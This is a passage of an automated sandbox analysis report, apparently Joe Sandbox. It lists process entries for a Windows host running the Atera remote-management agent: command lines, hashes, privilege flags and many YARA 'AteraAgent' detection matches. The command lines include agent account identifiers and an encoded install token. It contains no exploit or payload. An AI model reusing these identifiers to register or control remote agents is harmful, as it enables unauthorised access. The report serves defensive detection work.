                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:12:45:54
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff780550000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.2326892892.0000019C0DCB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.2326992640.0000019C0DDB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000003.2232568454.0000019C0DDD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.2326892892.0000019C0DCBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.2326892892.0000019C0DCD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:12:45:54
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:12:45:54
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff7c9600000
                                                                                                                                                                                                                                        File size:161'280 bytes
                                                                                                                                                                                                                                        MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2325162518.000001944A6C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:12:45:55
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\sppsvc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sppsvc.exe
                                                                                                                                                                                                                                        Imagebase:0x7ff748f40000
                                                                                                                                                                                                                                        File size:4'630'384 bytes
                                                                                                                                                                                                                                        MD5 hash:320823F03672CEB82CC3A169989ABD12
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:12:45:57
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "e2b0e7a4-c205-4ab0-a41f-defa03df179f" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x7ff72bec0000
                                                                                                                                                                                                                                        File size:72'744 bytes
                                                                                                                                                                                                                                        MD5 hash:67FEF41237025021CD4F792E8C24E95A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3054771885.0000015420BD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3066742035.00000154216D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3063112653.0000015420E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3066742035.00000154215C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3054771885.0000015420B9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3066742035.00000154216C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3054771885.0000015420BD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000000.2256494928.0000015420AA2000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3054771885.0000015420B90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3050283177.0000000E994F1000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3054771885.0000015420C22000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.3066742035.000001542163B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:12:45:57
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                        Start time:12:46:02
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "435e53fd-9fe0-4f2b-90af-84e628f86498" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x1d722460000
                                                                                                                                                                                                                                        File size:398'384 bytes
                                                                                                                                                                                                                                        MD5 hash:5E3252E0248B484E76FCDBF8B42A645D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2364287460.000001D7226DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2380195742.000001D73C906000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2364287460.000001D7226D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2364287460.000001D722713000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2366426691.000001D722990000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2392333057.00007FFDF1A19000.00000004.00000001.01000000.0000001C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2379965931.000001D73C6F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2380019255.000001D73C8F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2366809057.000001D72349F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2375461399.000001D73B677000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2375461399.000001D73B614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2365797816.000001D722822000.00000002.00000001.01000000.0000001D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2364287460.000001D722719000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2366809057.000001D722EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2364287460.000001D72275F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2363884167.000001D722550000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2379078434.000001D73BA20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                        Start time:12:46:02
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:12:46:04
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k smphost
                                                                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                        Start time:12:46:24
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "03083ea1-baf1-4e78-a683-5c6842958609" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x215a8c10000
                                                                                                                                                                                                                                        File size:178'728 bytes
                                                                                                                                                                                                                                        MD5 hash:83FD950ED584099A4125EFBA77E26BAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2696202477.00000215A96B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2691710517.00000215A8E40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2696202477.00000215A9700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2726183345.00000215C20E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2696202477.00000215A9581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2720526513.00000215C1EC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2691710517.00000215A8EC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2720714213.00000215C1EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2691710517.00000215A8EC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2695588090.00000215A9080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2691710517.00000215A8E8B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2691710517.00000215A8E7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000029.00000002.2696202477.00000215A97BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                        Start time:12:46:24
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                        Start time:12:46:25
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff780550000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002B.00000002.2626592410.0000026D2DB40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002B.00000003.2538790909.0000026D2DC60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002B.00000002.2626766337.0000026D2DC40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002B.00000002.2626592410.0000026D2DB63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002B.00000002.2626592410.0000026D2DB4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:12:46:25
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                        Start time:12:46:25
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff7c9600000
                                                                                                                                                                                                                                        File size:161'280 bytes
                                                                                                                                                                                                                                        MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002D.00000002.2623513745.00000221DBBF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:12:46:28
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "8156d760-c467-46e9-825a-383940c0c629" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x1af6aab0000
                                                                                                                                                                                                                                        File size:57'896 bytes
                                                                                                                                                                                                                                        MD5 hash:E9794F785780945D2DDE78520B9BB59F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2941460212.000001AF00275000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2967904200.000001AF6BDA1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2962478555.000001AF6AC21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2962478555.000001AF6AC2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2962478555.000001AF6ABE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2967489603.000001AF6B085000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2962478555.000001AF6AC6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
